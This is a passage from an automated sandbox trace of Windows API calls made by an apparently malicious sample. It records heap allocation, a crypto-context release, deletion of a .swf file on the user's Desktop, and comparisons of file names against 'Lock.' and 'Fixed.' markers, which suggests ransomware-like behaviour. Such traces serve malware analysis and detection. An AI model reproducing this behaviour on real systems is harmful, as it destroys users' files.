dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.098] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.098] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0152.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0152.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0152.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0152.099] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.100] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0152.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0152.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.101] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.101] FreeLibrary (hLibModule=0x756e0000) returned 1 [0152.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.101] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.102] CloseHandle (hObject=0x2a0) returned 1 [0152.282] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.282] CloseHandle (hObject=0x2d0) returned 1 [0152.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.288] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0152.288] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/F Elbom0O1NrT.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf", lpFilePart=0x8cedf4*="F Elbom0O1NrT.swf") returned 0x29 [0152.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\f elbom0o1nrt.swf")) returned 0x20 [0152.288] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2abfd0, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x17707a50, ftLastAccessTime.dwHighDateTime=0x1d5edf7, ftLastWriteTime.dwLowDateTime=0x17707a50, ftLastWriteTime.dwHighDateTime=0x1d5edf7, nFileSizeHigh=0x0, nFileSizeLow=0x9904, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="F Elbom0O1NrT.swf", cAlternateFileName="FELBOM~1.SWF")) returned 0xa872d0 [0152.288] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\f elbom0o1nrt.swf")) returned 1 [0152.290] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2abfd0, ftCreationTime.dwHighDateTime=0x1d5ed08, ftLastAccessTime.dwLowDateTime=0x17707a50, ftLastAccessTime.dwHighDateTime=0x1d5edf7, ftLastWriteTime.dwLowDateTime=0x17707a50, ftLastWriteTime.dwHighDateTime=0x1d5edf7, nFileSizeHigh=0x0, nFileSizeLow=0x9904, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="F Elbom0O1NrT.swf", cAlternateFileName="FELBOM~1.SWF")) returned 0 [0152.290] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0152.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0152.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0152.291] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0152.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0152.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0152.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0152.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0152.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0152.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0152.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0152.292] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/F Elbom0O1NrT.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf", lpFilePart=0x8cf650*="F Elbom0O1NrT.swf") returned 0x29 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0152.292] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\F Elbom0O1NrT.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\f elbom0o1nrt.swf")) returned 0xffffffff [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0152.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0152.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0152.293] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0152.293] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.293] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0152.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0152.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0152.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0152.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHvT80V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HvT80V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vT80V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T80V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="80V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pq3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0152.294] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0152.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0152.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0152.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0152.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0152.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977938 [0152.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHvT80V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HvT80V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vT80V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T80V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="80V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.295] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pq3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3d.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 